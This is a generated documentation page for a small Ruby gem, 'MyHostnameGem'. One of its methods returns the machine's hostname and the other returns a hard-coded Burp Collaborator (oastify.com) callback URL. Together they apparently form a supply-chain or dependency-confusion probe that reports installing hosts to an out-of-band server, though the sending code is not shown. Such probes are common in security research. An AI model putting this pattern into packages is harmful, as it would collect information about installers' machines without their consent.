Module: MyHostnameGem
- Defined in:
- lib/my_hostname_gem.rb
Class Method Summary collapse
Class Method Details
.burp_collaborator_link ⇒ Object
8 9 10 11 |
# File 'lib/my_hostname_gem.rb', line 8 def self.burp_collaborator_link # Modify the URL to your Burp Collaborator link "http://m4rh16lxe0whysi4uu8jsp0ej5pvdk.oastify.com" end |
.hostname ⇒ Object
4 5 6 |
# File 'lib/my_hostname_gem.rb', line 4 def self.hostname Socket.gethostname end |